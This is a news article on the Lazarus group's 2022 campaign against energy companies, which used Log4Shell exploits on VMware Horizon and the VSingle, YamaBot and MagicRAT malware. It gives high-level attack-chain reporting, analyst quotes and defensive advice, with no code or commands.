Lazarus Hackers Exploiting Log4j Vulnerabilities to Target U.S. Energy Companies
North Korean Lazarus group is targeting critical infrastructure through existing Log4j vulnerabilities and newly developed MagicRAT malware.
North Korean Advanced Persistent Threat (APT) group APT38, also known as the Lazarus group, is targeting energy companies in the U.S., Japan, and Canada. According to Cisco Talos, APT 38 targets VMWare Horizon instances by exploiting the widely prevalent Log4j vulnerabilities.
APT38, commonly known as Lazarus and Hidden Cobra, is a North Korean state-sponsored cybercrime group that earned infamy by orchestrating the $620 million Ronin Network crypto heist, the biggest cryptocurrency theft in history, in April 2022. It was also behind the WannaCry ransomware attack in 2017 and other data exfiltration and cyber espionage activities.
The nation-state group kicked off its latest campaign against energy companies in February 2022, a couple of months before the Ronin Network crypto heist. According to threat research firm Cisco Talos, APT38’s campaign was active until July this year.
Lazarus’ established its initial entry point into internet-facing VMware Horizon installations by exploiting the highly prevalent Log4Shell vulnerabilities in the Java-based logging framework Log4j.
“The Log4j exploit used in these attacks has been known, and called critical, for over a year. However, our adversaries are still able to find and exploit unpatched sites that are directly connected to the internet,” Erich Kron, security awareness advocate at KnowBe4, told Spiceworks.
“In June of 2022, CISA issued an alert (AA22-174A) specifically addressing this threat. However, it seems there are still systems that have not been patched yet. This poses a huge threat to some of the most critical systems within the critical infrastructure space.”
In July 2022, the Department of Homeland Security’s Cyber Safety Review Board (CSRB) described Log4Shell vulnerabilities as endemic given the ubiquity of Log4j across a multitude of computer and industrial control systems, servers, and networks. CSRB assessed that it could take up to a decade, maybe more, for organizations worldwide to patch Log4Shell flaws.
Once in, Lazarus deployed VSingle and YamaBot, two malware strains exclusive to its operations, and a third “relatively simple” remote access trojan dubbed MagicRAT by Cisco Talos. The company clarified that Symantec and South Korea’s AhnLab previously detailed the campaign but Lazarus has updated its M.O., evident from the use of MagicRAT.
Lazarus first establishes a reverse shell and manually sets up a backdoor into the compromised systems through VSingle, which then allows it to establish another reverse shell. VSingle serves as a reconnaissance, backdoor and exfiltration tool to execute arbitrary code, download plugins, and create the possibility of lateral movement.
It also prepares for the next step: the theft of credentials. Meanwhile, YamaBot is set up to establish communication between the target system and the command-and-control (C2) servers.
See More: Lessons Learned from Cyberattacks on Critical Infrastructure
Finally, MagicRAT is deployed after being downloaded from a remote location. MagicRAT is a simple remote access trojan that uses the Qt framework, performs system environment reconnaissance and can download additional payloads, such as custom-built port scanners and malware, such as TigerRAT.
Since the Qt framework is a library for developing graphical user interfaces, something that serves no purpose in the attack, Talos said its purpose in MagicRAT is “making human analysis harder, and automated detection through machine learning and heuristics less likely.”
“The discovery of MagicRAT in the wild is an indication of Lazarus’ motivations to rapidly build new, bespoke malware to use along with their previously known malware such as TigerRAT to target organizations worldwide,” Talos added.
Lazarus Group Attack Chain Against Energy Companies Through Log4Shell Using MagicRAT | Source: Cisco Talos
The Lazarus attack campaign against American, Japanese, and Canadian energy companies involves regular and custom-made malware for specific operations. Chris Clements, vice president of solutions architecture at Cerberus Sentinel, told Spiceworks, “The targeted nature of their campaigns also means they can take target specific approaches by analyzing the individual behaviors and operations at their objective organization.“
“Most general cybercrime is opportunistic in nature, using simple and cheap means such as mass phishing campaigns and automated password guessing bots to cast a wide net to potential victims. That the non-targeted approach is so regularly successful should give us pause when assessing the risk of a hyper targeted attack from highly skilled adversaries with both ample budget and a specific mission,” he added.
Cisco Talos believes that the primary goal of the Lazarus campaign is to help the Kim Jong-un regime by establishing long-term access to the networks of energy companies.
It also aligns with the group’s previous attacks against critical infrastructure, also at the behest of the North Korean government. Kron noted that besides stealing intellectual property, the access could be weaponized “and potentially cripple many power and energy sites across the country.”
CISA has a dedicated page for cybercriminal activity emanating from North Korea. The U.S. State Department has put a $10 million bounty, double the original $5 million, for information on DPRK-linked malicious cyber activity and threat actors.
Clemens said it is still possible to mitigate risk by investing in cybersecurity fundamentals, beginning with a strong cultural approach. This includes investing in segmentation, attack surface reduction, and system hardening tools and enhancing threat hunting and rapid alerting of suspicious behavior to neutralize threats quickly. He also advocated conducting penetration testing to identify vulnerabilities from omissions or misconfigurations before attackers can exploit them.
“The problem is that it’s easy enough to say and understand the factors that contribute to cybersecurity resiliency, but implementation is challenging, especially in organizations with competing priorities and limited resources. To be successful, leaders must own the reality of cybersecurity threats and dedicate both the human and monetary resources to protecting their organizations.
– Chris Clements, VP of solutions architecture at Cerberus Sentinel
For organizations that leverage software vulnerable to Log4j vulnerabilities, which is a lot, Kron advised they “should immediately remove direct internet access from the devices until the vulnerabilities are mitigated.” Log4j accounted for 14% of the total exploitation incidents between March 2021 and April 2022.
Let us know if you enjoyed reading this news on LinkedIn, Twitter, or Facebook. We would love to hear from you!
MORE ON CYBERATTACKS
